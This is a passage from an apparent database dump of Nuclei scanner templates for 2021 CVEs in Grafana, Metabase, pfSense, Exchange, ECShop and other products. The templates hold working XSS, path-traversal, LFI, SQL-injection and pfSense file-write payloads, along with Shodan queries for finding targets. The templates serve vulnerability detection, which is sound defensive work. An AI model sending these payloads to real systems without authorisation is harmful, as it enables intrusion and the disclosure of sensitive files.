"CVE-2021-40973.yaml", "content": "id: CVE-2021-40973\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.5.2\n reference:\n - https://github.com/spotweb/spotweb/\n - https://github.com/spotweb/spotweb/issues/711\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40973\n - https://github.com/spotweb/spotweb\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-40973\n cwe-id: CWE-79\n epss-score: 0.00152\n epss-percentile: 0.51404\n cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: spotweb_project\n product: spotweb\n shodan-query: title:\"SpotWeb - overview\"\n tags: cve2021,cve,xss,spotweb,spotweb_project\n\nhttp:\n - raw:\n - |\n POST /install.php?page=4 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n settingsform[lastname]=pdteam'+onclick='alert(document.domain)\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"onclick='alert(document.domain)\"\n - \"Spotweb\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950", "hash": "f0d2184d29efe9abb8df3371d508159d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bc" }, "name": "CVE-2021-40978.yaml", "content": "id: CVE-2021-40978\n\ninfo:\n name: MKdocs 1.2.2 - Directory Traversal\n author: pikpikcu\n severity: high\n description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.\n impact: |\n An attacker can read or modify sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade MKdocs to version 1.2.3 or later to fix the directory traversal vulnerability.\n reference:\n - https://github.com/mkdocs/mkdocs/pull/2604\n - https://github.com/nisdn/CVE-2021-40978\n - https://nvd.nist.gov/vuln/detail/CVE-2021-40978\n - https://github.com/mkdocs/mkdocs\n - https://github.com/mkdocs/mkdocs/issues/2601\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-40978\n cwe-id: CWE-22\n epss-score: 0.03461\n epss-percentile: 0.90554\n cpe: cpe:2.3:a:mkdocs:mkdocs:1.2.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: mkdocs\n product: mkdocs\n tags: cve2021,cve,mkdocs,lfi\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:[x*]:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200d3f8bfca9ff864b5abf41834779fd591efcbfccda6cd6d38a6edd71e4e6d97c022042f51441b7d5514ffd65f8467500374e8e43b594839c46aa9ca5cd6aa754e558:922c64590222798bb761d5b6d8e72950", "hash": "72ba191e530a4aef99504434cc79bb93", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bd" }, "name": "CVE-2021-41174.yaml", "content": "id: CVE-2021-41174\n\ninfo:\n name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting\n author: pdteam\n severity: medium\n description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the Grafana application.\n remediation: Upgrade to 8.2.3 or higher.\n reference:\n - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41174\n - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82\n - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912\n - https://github.com/grafana/grafana/commit/fb85ed691290d211a5baa44d9a641ab137f0de88\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-41174\n cwe-id: CWE-79\n epss-score: 0.96194\n epss-percentile: 0.99478\n cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: grafana\n product: grafana\n shodan-query: title:\"Grafana\"\n tags: cve2021,cve,grafana,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1\"\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Grafana\"\n - \"frontend_boot_js_done_time_seconds\"\n condition: and\n\n - type: regex\n regex:\n - '\"subTitle\":\"Grafana (v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"subTitle\":\"Grafana ([a-z0-9.]+)'\n# digest: 4a0a004730450220733d9c9b0886194993d30c8b74ff942bf173ce98bc4618221bada7e54cc36574022100d4fe7afdb96b7f8631d53583b1d36f658e8156a630ce09b79dc52b60b73a80e6:922c64590222798bb761d5b6d8e72950", "hash": "8243451b58ed1f4f6186fc8960affcbe", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083be" }, "name": "CVE-2021-41192.yaml", "content": "id: CVE-2021-41192\n\ninfo:\n name: Redash Setup Configuration - Default Secrets Disclosure\n author: bananabr\n severity: medium\n description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.\n impact: |\n An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application.\n remediation: |\n Remove or update the default secrets in the Redash setup configuration file.\n reference:\n - https://hackerone.com/reports/1380121\n - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41192\n - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-41192\n cwe-id: CWE-1188\n epss-score: 0.00805\n epss-percentile: 0.79795\n cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: \"redash\"\n product: \"redash\"\n shodan-query: http.favicon.hash:698624197\n tags: cve2021,cve,hackerone,redash,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs\"\n - \"{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Enter your new password:\"\n - \"redash\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950", "hash": "349bcec6f5351a369f272b57baa49dd7", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083bf" }, "name": "CVE-2021-41266.yaml", "content": "id: CVE-2021-41266\n\ninfo:\n name: MinIO Operator Console Authentication Bypass\n author: alevsk\n severity: critical\n description: |\n MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.\n remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.'\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41266\n - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36\n - https://github.com/minio/console/pull/1217\n - https://github.com/HimmelAward/Goby_POC\n - https://github.com/StarCrossPortal/scalpel\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-41266\n cwe-id: CWE-306\n epss-score: 0.05383\n epss-percentile: 0.92945\n cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: min\n product: minio_console\n tags: cve2021,cve,minio,min\n\nhttp:\n - raw:\n - |\n POST /api/v1/login/oauth2/auth HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/json\n\n {\"code\":\"test\",\"state\":\"test\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"sessionId\"\n\n - type: word\n part: header\n words:\n - \"token\"\n\n - type: status\n status:\n - 201\n - 200\n condition: or\n# digest: 4a0a00473045022100c35952887fbf6a00dac86888eb66ce0d229df442c79d7d92e1bf221def61f25a02207b2947243349965dd74e419e57d9012011b56c341d14cf8a6d54b43b094ff7f5:922c64590222798bb761d5b6d8e72950", "hash": "e722312f5228af47d6358d8c98003b78", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c0" }, "name": "CVE-2021-41277.yaml", "content": "id: CVE-2021-41277\n\ninfo:\n name: Metabase - Local File Inclusion\n author: 0x_Akoko,DhiyaneshDK\n severity: high\n description: |\n Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.\n impact: |\n The vulnerability can result in unauthorized access to sensitive files or execution of arbitrary code on the affected system.\n remediation: |\n This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.\n reference:\n - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41277\n - https://twitter.com/90security/status/1461923313819832324\n - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0\n - https://github.com/pen4uin/vulnerability-research-list\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41277\n cwe-id: CWE-22,CWE-200\n epss-score: 0.95622\n epss-percentile: 0.99363\n cpe: cpe:2.3:a:metabase:metabase:0.40.0:-:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: metabase\n product: metabase\n shodan-query: http.title:\"Metabase\"\n fofa-query: app=\"Metabase\"\n tags: cve2021,cve,metabase,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/geojson?url=file:///etc/passwd\"\n - \"{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini\"\n\n stop-at-first-match: true\n matchers-condition: or\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a004630440220350c5cacd0b231c91cdf48cda99ca1fc36a943c4e8b30342fabb9e5d0e1e7da50220450b72c0220ec3d7731717f613df423ce4f6468614feeb9c732013fb4702ba9b:922c64590222798bb761d5b6d8e72950", "hash": "981419a9d8df5bad19ff004b50679054", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c1" }, "name": "CVE-2021-41282.yaml", "content": "id: CVE-2021-41282\n\ninfo:\n name: pfSense - Arbitrary File Write\n author: cckuailong\n severity: high\n description: |\n diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized modification of critical system files, potentially resulting in a complete compromise of the pfSense firewall.\n remediation: |\n Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.\n reference:\n - https://www.shielder.it/advisories/pfsense-remote-command-execution/\n - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/\n - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41282\n - https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-41282\n cwe-id: CWE-74\n epss-score: 0.97305\n epss-percentile: 0.9986\n cpe: cpe:2.3:a:pfsense:pfsense:2.5.2:*:*:*:*:*:*:*\n metadata:\n max-request: 4\n vendor: pfsense\n product: pfsense\n tags: cve2021,cve,pfsense,rce,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n __csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n - |\n GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /test.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(body, 'c3959e8a43f1b39b0d1255961685a238')\"\n - \"status_code==200\"\n condition: and\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - '(sid:[a-z0-9,;:]+)'\n internal: true\n part: body\n# digest: 4b0a00483046022100b22b55fdb5766d919894391f7177aae918603c8c010a1c3dc548f96ef4a45c4d022100db611b361bcb272bcc4771ae5352992d3c7c34007b9abb407fa3339df77adcb8:922c64590222798bb761d5b6d8e72950", "hash": "aec24f7dd87a1899a3b5ca3e5ce7f3b3", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c2" }, "name": "CVE-2021-41291.yaml", "content": "id: CVE-2021-41291\n\ninfo:\n name: ECOA Building Automation System - Directory Traversal Content Disclosure\n author: gy741\n severity: high\n description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device\n impact: |\n An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41291\n - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php\n - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html\n - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41291\n cwe-id: CWE-22\n epss-score: 0.03741\n epss-percentile: 0.90901\n cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ecoa\n product: ecs_router_controller-ecs_firmware\n tags: cve2021,cve,ecoa,lfi,traversal\n\nhttp:\n - raw:\n - |\n GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502207f8b0908b97ff22a89570504251e0836c8b463840c12b998c3766012a1d119a4022100b3627c4c9891d062199b46f969ac720a58088e0472f1ed7e0b44c762688f5cc8:922c64590222798bb761d5b6d8e72950", "hash": "e278ed8eb453b0590e25ceddcca3df1e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c3" }, "name": "CVE-2021-41293.yaml", "content": "id: CVE-2021-41293\n\ninfo:\n name: ECOA Building Automation System - Arbitrary File Retrieval\n author: 0x_Akoko\n severity: high\n description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the arbitrary file retrieval vulnerability in the ECOA Building Automation System.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41293\n - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php\n - https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41293\n cwe-id: CWE-22\n epss-score: 0.05376\n epss-percentile: 0.92942\n cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ecoa\n product: ecs_router_controller-ecs_firmware\n tags: cve2021,cve,ecoa,lfi,disclosure\n\nhttp:\n - raw:\n - |\n POST /viewlog.jsp HTTP/1.1\n Host: {{Hostname}}\n\n yr=2021&mh=6&fname=../../../../../../../../etc/passwd\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201cf6f41a3258c77f1c2a596c881f1d3f0724e938d4f7c03970e59b0c76aa7456022005d47055e3129d39fb98a626771da66a86a32cac9bd81dd969c7b575d3beeacf:922c64590222798bb761d5b6d8e72950", "hash": "512688a17624a2e07f96250eefb36297", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c4" }, "name": "CVE-2021-41349.yaml", "content": "id: CVE-2021-41349\n\ninfo:\n name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting\n author: rootxharsh,iamnoooob\n severity: medium\n description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities.\n remediation: |\n Apply the latest security updates provided by Microsoft to mitigate this vulnerability.\n reference:\n - https://www.microsoft.com/en-us/download/details.aspx?id=103643\n - https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41349\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41349\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-41349\n epss-score: 0.96172\n epss-percentile: 0.99474\n cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: microsoft\n product: exchange_server\n tags: cve,cve2021,xss,microsoft,exchange\n\nhttp:\n - raw:\n - |\n POST /autodiscover/autodiscover.json HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n %3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'alert(document.domain);'\n - 'a=\"\"'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: word\n negative: true\n words:\n - \"A potentially dangerous Request.Form value was detected from the client\"\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022100aecde373293992828c4cfbb89e9aaeff35886bd612304c87e362070bf8bfa32f022053555cdc30e1b0aae2d359b107cd5d99f26bbd2c678f6dcb59b7e21b635ea048:922c64590222798bb761d5b6d8e72950", "hash": "d767deb5bd3f93ace5ecd5dfce4f0743", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c5" }, "name": "CVE-2021-41381.yaml", "content": "id: CVE-2021-41381\n\ninfo:\n name: Payara Micro Community 5.2021.6 Directory Traversal\n author: pikpikcu\n severity: high\n description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.\n impact: |\n An attacker can access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information.\n remediation: |\n Upgrade to a patched version of Payara Micro Community or apply the necessary security patches to mitigate the directory traversal vulnerability.\n reference:\n - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41381\n - https://www.payara.fish\n - http://packetstormsecurity.com/files/164365/Payara-Micro-Community-5.2021.6-Directory-Traversal.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41381\n cwe-id: CWE-22\n epss-score: 0.10127\n epss-percentile: 0.94375\n cpe: cpe:2.3:a:payara:micro_community:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: payara\n product: micro_community\n tags: cve2021,cve,payara,lfi,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"payara.security.openid.default.providerURI=\"\n - \"payara.security.openid.sessionScopedConfiguration=true\"\n condition: and\n# digest: 490a00463044022057f649f251cd6b6209745201b3d661f96d0711386c299bb52936b9b9c3889c75022015b8ccd003d9e10a75b53739e4137e586d65760d1566d6669d87aced044185af:922c64590222798bb761d5b6d8e72950", "hash": "4ce3979732e6add41b3dd435c0d25b7d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c6" }, "name": "CVE-2021-41432.yaml", "content": "id: CVE-2021-41432\n\ninfo:\n name: FlatPress 1.2.1 - Stored Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/flatpressblog/flatpress/issues/88\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41432\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/martinkubecka/CVE-References\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2021-41432\n cwe-id: CWE-79\n epss-score: 0.00067\n epss-percentile: 0.27705\n cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: flatpress\n product: flatpress\n shodan-query: http.html:\"Flatpress\"\n tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykGJmx9vKsePrMkVp\n\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"user\"\n\n {{username}}\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"pass\"\n\n {{password}}\n ------WebKitFormBoundarykGJmx9vKsePrMkVp\n Content-Disposition: form-data; name=\"submit\"\n\n Login\n ------WebKitFormBoundarykGJmx9vKsePrMkVp--\n - |\n GET /admin.php?p=entry&action=write HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin.php?p=entry&action=write HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish\n - |\n GET /index.php/2022/10 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_4, '

    ')\n - contains(body_4, 'FlatPress')\n - contains(header_4, 'text/html')\n - status_code_4 == 200\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - name=\"_wpnonce\" value=\"([0-9a-z]+)\" />\n internal: true\n part: body\n# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950", "hash": "e84777ca5bd314f5ca20217ac5ad00c5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c7" }, "name": "CVE-2021-41460.yaml", "content": "id: CVE-2021-41460\n\ninfo:\n name: ECShop 4.1.0 - SQL Injection\n author: SleepingBag945\n severity: high\n description: |\n ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460).\n reference:\n - https://www.cnvd.org.cn/flaw/show/CNVD-2020-58823\n - https://nvd.nist.gov/vuln/detail/CVE-2021-41460\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-41460\n cwe-id: CWE-89\n epss-score: 0.00992\n epss-percentile: 0.83223\n cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: shopex\n product: ecshop\n fofa-query: product=\"ECShop\"\n tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /delete_cart_goods.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id=1||(updatexml(1,concat(0x7e,(select%20md5({{num}}))),1))\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'c8c605999f3d8352d7bb792cf3fdb25'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f97a087872b4e92f17b44312e692cfe4d0f8ec4a6f55166f35bcefacfcff9350220181d6e11e86c111ea5092c9e06badfb85abca47cb28463a32d64be15bf46c207:922c64590222798bb761d5b6d8e72950", "hash": "f0fe1a30fdc875a5fb3e74f2bb49d89c", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3083c8" }, "name": "CVE-2021-41467.yaml", "content": "id: CVE-2021-41467\n\ninfo:\n name: JustWriting - Cross-Site Scripting\n author: madrobot\n severity: medium\n description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.\n impact: 